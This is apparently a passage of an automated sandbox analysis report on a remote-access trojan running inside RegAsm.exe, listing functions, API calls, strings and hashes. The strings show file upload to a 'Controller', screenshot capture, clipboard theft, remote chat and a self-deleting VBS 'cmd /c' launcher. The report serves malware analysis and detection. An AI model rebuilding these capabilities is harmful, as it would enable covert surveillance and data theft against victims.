DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
GetCursorPos.USER32(?), ref: 0041D5E9
SetForegroundWindow.USER32(?), ref: 0041D5F2
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
ExitProcess.KERNEL32 ref: 0041D665
CreatePopupMenu.USER32 ref: 0041D66B
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680

Strings

Close, xrefs: 0041D671

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D

Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445DC6
_free.LIBCMT ref: 00445DDC
_free.LIBCMT ref: 00445DED
_free.LIBCMT ref: 00445DFE
_free.LIBCMT ref: 00445E15
GetCPInfo.KERNEL32(?,?), ref: 00445E5D

Part of subcall function 00452E74: _free.LIBCMT ref: 00452EDF

_free.LIBCMT ref: 00446009
_free.LIBCMT ref: 0044601C
_free.LIBCMT ref: 0044602A
_free.LIBCMT ref: 00446035
_free.LIBCMT ref: 00446077
_free.LIBCMT ref: 0044607F
_free.LIBCMT ref: 00446087
_free.LIBCMT ref: 0044608F
_free.LIBCMT ref: 0044609D

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65

Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
__aulldiv.LIBCMT ref: 00408D4D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
CloseHandle.KERNEL32(00000000), ref: 00408F64
CloseHandle.KERNEL32(00000000), ref: 00408FAE
CloseHandle.KERNEL32(00000000), ref: 00408FFC

Strings

Uploading file to Controller: , xrefs: 00408DD5
ReadFile error, xrefs: 00408FC8
SetFilePointerEx error, xrefs: 00408FD4
NG, xrefs: 00408C17

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
API String ID: 3086580692-2582957567
Opcode ID: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
Opcode Fuzzy Hash: 72fad283c4fe1643dee5b4a459ce18e644925f4e3f1a855a4ff9453ab0215ac4
Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B

Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0045130A

Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
Part of subcall function 00450502: _free.LIBCMT ref: 00450531
Part of subcall function 00450502: _free.LIBCMT ref: 00450543
Part of subcall function 00450502: _free.LIBCMT ref: 00450555
Part of subcall function 00450502: _free.LIBCMT ref: 00450567
Part of subcall function 00450502: _free.LIBCMT ref: 00450579
Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
Part of subcall function 00450502: _free.LIBCMT ref: 004505F7

_free.LIBCMT ref: 004512FF

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00451321
_free.LIBCMT ref: 00451336
_free.LIBCMT ref: 00451341
_free.LIBCMT ref: 00451363
_free.LIBCMT ref: 00451376
_free.LIBCMT ref: 00451384
_free.LIBCMT ref: 0045138F
_free.LIBCMT ref: 004513C7
_free.LIBCMT ref: 004513CE
_free.LIBCMT ref: 004513EB
_free.LIBCMT ref: 00451403

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59

Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00419FB9
GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
Sleep.KERNEL32(000003E8), ref: 0041A0FD
GetLocalTime.KERNEL32(?), ref: 0041A105
Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4

Strings

PG, xrefs: 0041A016
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 0041A09A, 0041A0BB, 0041A129
PG, xrefs: 0041A1AD
time_%04i%02i%02i_%02i%02i%02i, xrefs: 0041A09F
PG, xrefs: 0041A0C9

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
API String ID: 489098229-1431523004
Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799

Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
ExitProcess.KERNEL32 ref: 0040D9C4

Strings

.vbs, xrefs: 0040D85F
8SG, xrefs: 0040D80F
open, xrefs: 0040D9B2
Temp, xrefs: 0040D89A
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040D967
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D8F9
""", 0, xrefs: 0040D8E1
exepath, xrefs: 0040D831

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-3159800282
Opcode ID: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
Opcode Fuzzy Hash: 636c7451f86ad7dcbf51a7e77965c9df5bd33ebd3fbbde82d92fca028294b8c2
Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98

Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450648
_free.LIBCMT ref: 0045066C
_free.LIBCMT ref: 00450679
_free.LIBCMT ref: 0045069E
_free.LIBCMT ref: 004506AB
_free.LIBCMT ref: 004506B4
_free.LIBCMT ref: 00450992
_free.LIBCMT ref: 0045099A

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798

Function 00404E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
CloseHandle.KERNEL32(?), ref: 00404E4C
closesocket.WS2_32(000000FF), ref: 00404E5A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
CloseHandle.KERNEL32(?), ref: 00404EBF
CloseHandle.KERNEL32(?), ref: 00404EC4
SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
CloseHandle.KERNEL32(?), ref: 00404ED6

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID:
API String ID: 3658366068-0
Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6

GetLastError.KERNEL32 ref: 00455CEF
__dosmaperr.LIBCMT ref: 00455CF6
GetFileType.KERNEL32 ref: 00455D02
GetLastError.KERNEL32 ref: 00455D0C
__dosmaperr.LIBCMT ref: 00455D15
CloseHandle.KERNEL32(00000000), ref: 00455D35
CloseHandle.KERNEL32(?), ref: 00455E7F
GetLastError.KERNEL32 ref: 00455EB1
__dosmaperr.LIBCMT ref: 00455EB8

Strings

H, xrefs: 00455E3D

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59

Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
__alloca_probe_16.LIBCMT ref: 00453EEA
MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
__alloca_probe_16.LIBCMT ref: 00453F94
MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
__freea.LIBCMT ref: 00454003
__freea.LIBCMT ref: 0045400F

Strings

\@E, xrefs: 00453F37, 00453DF1

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID: \@E
API String ID: 201697637-1814623452
Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768

Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450A94
_free.LIBCMT ref: 00450AA2
_free.LIBCMT ref: 00450BD0
_free.LIBCMT ref: 00450BDB

Strings

\&G, xrefs: 00450C1C
`&G, xrefs: 00450C34
\&G, xrefs: 00450C24

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID: \&G$\&G$`&G
API String ID: 269201875-253610517
Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98

Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

udp, xrefs: 00414C60, 00414C68, 00414C6C
65535, xrefs: 00414BB3

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E

Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
__dosmaperr.LIBCMT ref: 0043A8A6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
__dosmaperr.LIBCMT ref: 0043A8E3
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
__dosmaperr.LIBCMT ref: 0043A937
_free.LIBCMT ref: 0043A943
_free.LIBCMT ref: 0043A94A

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A

Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 004054BF
GetMessageA.USER32 ref: 0040556F
TranslateMessage.USER32(?), ref: 0040557E
DispatchMessageA.USER32 ref: 00405589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

DisplayMessage, xrefs: 004055EC
CloseChat, xrefs: 00405609
GetMessage, xrefs: 004055F8

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: 685fd760973951ef657dab710ca0ffd0d5e343078631b5a88e9e506cca6722c1
Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
Opcode Fuzzy Hash: 685fd760973951ef657dab710ca0ffd0d5e343078631b5a88e9e506cca6722c1
Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A

Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
CloseHandle.KERNEL32(00000000), ref: 00417DE5
DeleteFileA.KERNEL32(00000000), ref: 00417DF4
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

0VG, xrefs: 00417E21
0VG, xrefs: 00417DB5
Temp, xrefs: 00417D00
@, xrefs: 00417D8A
<, xrefs: 00417D83

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: 0VG$0VG$<$@$Temp
API String ID: 1704390241-2575729100
Opcode ID: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
Opcode Fuzzy Hash: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99

Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00416941
EmptyClipboard.USER32 ref: 0041694F
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32 ref: 0041696C
GlobalLock.KERNEL32 ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID: !D@
API String ID: 2172192267-604454484
Opcode ID: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
Opcode Fuzzy Hash: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69

Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
GetFileSize.KERNEL32(?,00000000), ref: 00413432
UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
CloseHandle.KERNEL32(00000000), ref: 0041345F
CloseHandle.KERNEL32(?), ref: 00413465

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingSizeUnmap
String ID:
API String ID: 297527592-0
Opcode ID: bef862da68c42bf5fbd2785df6b76de022a9e3cec21f96b302baad986bf2a6f2
Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
Opcode Fuzzy Hash: bef862da68c42bf5fbd2785df6b76de022a9e3cec21f96b302baad986bf2a6f2
Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E

Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA

Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448135

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00448141
_free.LIBCMT ref: 0044814C
_free.LIBCMT ref: 00448157
_free.LIBCMT ref: 00448162
_free.LIBCMT ref: 0044816D
_free.LIBCMT ref: 00448178
_free.LIBCMT ref: 00448183
_free.LIBCMT ref: 0044818E
_free.LIBCMT ref: 0044819C

Memory Dump Source

